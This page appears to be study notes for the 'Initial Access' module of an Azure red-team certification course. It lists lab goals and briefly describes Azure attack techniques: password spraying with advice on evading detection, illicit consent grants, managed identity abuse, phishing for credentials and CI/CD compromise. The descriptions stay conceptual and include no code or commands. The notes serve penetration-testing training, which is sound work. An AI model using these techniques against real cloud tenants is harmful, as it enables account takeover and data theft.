CARTP Certified Azure Red Team Professional
  • README
  • Introduction
    • Topics
  • Recon & Discovery
    • Topics
  • Initial Access
    • Topics
  • Enumeration
    • Topics
  • Privilege Escalation
    • Page 5
  • Lateral Movement
    • Topics
  • Persistence
    • Topics
  • Data Mining
    • Topics
    • Page 8
  • Defenses
    • Topics
  • Defenses Bypass
    • Topics
Powered by GitBook
On this page
  1. Initial Access

Topics

PreviousTopicsNextTopics

Last updated 1 year ago

  • Understand opsec fails when using attacks like password spraying in the cloud

  • Learn about MS Graph API permissions. Understand the differences between the low impact permissions and high impact ones.

  • Execute Illicit Consent Grant attack for initial access against multiple user simulations in the lab. Go from a simple access token to workstation compromise and further.

  • Abuse internet facing web applications to get a foothold. Use Managed Identity assigned to the web applications for further access.

  • Abuse Insecure storage accounts.

  • Execute phishing attacks against a user simulation to get their clear-text credentials.

  • Use application credentials to access the target tenant.

  • Abuse CI/CD to get access to an Azure tenant by compromising a GitHub account

Tactics and Techniques

Understanding OpSec Fails with Cloud-Based Attacks

When performing password spraying or similar attacks in the cloud, operators must be mindful of operational security (OpSec). These failures often occur due to excessive login attempts, leading to lockouts or alerts. To mitigate this, attackers often use low-frequency attempts over an extended period, or employ IP rotation to avoid detection.

Microsoft Graph API Permissions

The Microsoft Graph API offers different levels of permissions, from low impact (reading user profiles) to high impact (modifying domain settings). Understanding these can be crucial when attempting to elevate privileges or access sensitive information without raising suspicion.

Illicit Consent Grant Attack

An Illicit Consent Grant attack involves tricking a user or administrative account into granting a malicious application permissions within a target environment. This can lead to initial access and potentially full domain compromise if high-impact permissions are granted.

Abusing Internet Facing Web Applications

Web applications, especially those with misconfigured Managed Identities, can serve as entry points into the target environment. Attackers can exploit these to gain initial access and escalate their privileges within the cloud environment.

Insecure Storage Accounts

Insecurely configured storage accounts can expose sensitive data or serve as entry points for further attacks. It's crucial to secure these resources properly to prevent data loss or unauthorized access.

Phishing for Credentials

Phishing remains one of the most effective methods of gaining initial access. By deceiving users into providing their credentials, attackers can bypass many security controls that rely on authentication mechanisms.

Application Credentials Abuse

Application credentials, if not properly secured, can be a goldmine for attackers. These credentials often bypass multi-factor authentication (MFA) and can give attackers broad access to cloud resources.

Compromising CI/CD Pipelines

By targeting Continuous Integration/Continuous Deployment (CI/CD) pipelines, particularly through compromised developer accounts or third-party applications like GitHub, attackers can inject malicious code or gain access to sensitive environments and cloud resources.

Sign up to our mailing list to receive updates!